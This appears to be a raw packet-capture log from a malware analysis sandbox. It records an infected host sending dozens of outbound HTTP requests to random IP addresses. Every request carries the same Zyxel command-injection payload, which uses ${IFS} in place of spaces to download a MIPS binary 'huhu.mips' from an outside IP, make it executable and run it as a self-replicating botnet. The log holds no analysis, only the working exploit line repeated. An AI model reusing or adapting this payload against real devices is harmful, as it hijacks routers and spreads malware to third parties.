                                                      Feb 2, 2024 06:35:38.336035967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      829192.168.2.1444416192.84.246.245443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.336112976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      830192.168.2.1437692156.234.91.44443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.336138010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      831192.168.2.1452218126.168.194.254443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.336205959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      832192.168.2.143764238.66.86.1443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.336272955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      833192.168.2.1452964143.12.152.18443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.336323977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      834192.168.2.1437726210.222.56.106443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.336373091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      835192.168.2.1445878134.82.16.120443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.336441040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      836192.168.2.143674853.143.223.215443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.336519957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      837192.168.2.144260653.151.246.153443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.336587906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      838192.168.2.1452240106.213.103.222443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.336659908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      839192.168.2.1434344204.66.34.31443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.336716890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      840192.168.2.1457660151.230.90.33443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.336764097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      841192.168.2.143673072.138.125.44443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.336815119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      842192.168.2.145535671.127.93.174443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.336879969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      843192.168.2.1436210144.187.128.144443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.336927891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      844192.168.2.1439386160.64.241.167443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.336961985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      845192.168.2.1442664177.26.86.103443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.337008953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      846192.168.2.144190288.95.8.102443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.337063074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      847192.168.2.1433230186.227.124.67443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.337130070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      848192.168.2.144490673.104.7.80443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.337172985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      849192.168.2.1449030163.8.57.39443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.337275982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      850192.168.2.144184864.10.173.209443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.337322950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      851192.168.2.144582212.182.191.132443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.337383986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      852192.168.2.1438578125.58.190.159443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.337447882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      853192.168.2.1435438143.110.221.43443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.337476015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      854192.168.2.144369843.209.250.25443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.337553024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      855192.168.2.1439348134.161.188.106443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.337606907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      856192.168.2.144542075.225.153.165443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.337675095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      857192.168.2.144134234.234.108.65443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.337707043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      858192.168.2.145951253.19.213.105443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.337766886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      859192.168.2.1443016184.76.127.74443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.337829113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      860192.168.2.1436062181.56.54.55443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.337907076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      861192.168.2.145787427.36.209.103443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.337965965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      862192.168.2.143420638.14.96.159443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.338026047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      863192.168.2.1448670172.90.89.49443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.338103056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      864192.168.2.145742818.72.165.180443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.338144064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      865192.168.2.143683431.77.104.200443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.338191986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      866192.168.2.145180249.162.159.42443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.338253975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      867192.168.2.1438490122.26.2.210443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.338282108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      868192.168.2.1450580183.247.71.56443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.338366985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      869192.168.2.145699642.238.58.137443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.338416100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      870192.168.2.143929691.244.54.28443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.338462114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      871192.168.2.145806048.238.150.195443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.338514090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      872192.168.2.1433276219.99.156.50443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.338582993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      873192.168.2.1433722156.116.58.62443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.338633060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      874192.168.2.14333661.74.23.214443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.338680029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      875192.168.2.1446580105.101.40.158443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.338710070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      876192.168.2.1447374128.178.9.104443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.338769913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      877192.168.2.145439066.199.247.179443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.338816881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      878192.168.2.1451820106.11.20.192443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.338898897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      879192.168.2.144057292.34.5.210443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.338968039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      880192.168.2.1435796134.180.106.26443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.339010954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      881192.168.2.14608844.10.140.135443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.339057922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      882192.168.2.144645445.25.130.138443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.339085102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      883192.168.2.1437578195.49.115.77443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.339149952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      884192.168.2.1460244116.106.231.231443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.339169025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      885192.168.2.143482058.76.56.252443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.339216948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      886192.168.2.143358644.88.40.226443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.339262962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      887192.168.2.144843681.183.28.133443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.339335918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      888192.168.2.143696012.17.236.133443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.339397907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      889192.168.2.145208078.193.230.107443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.339452982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      890192.168.2.144583264.127.204.132443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.339508057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      891192.168.2.1434688177.175.113.6443
                                                      TimestampBytes transferredDirectionData
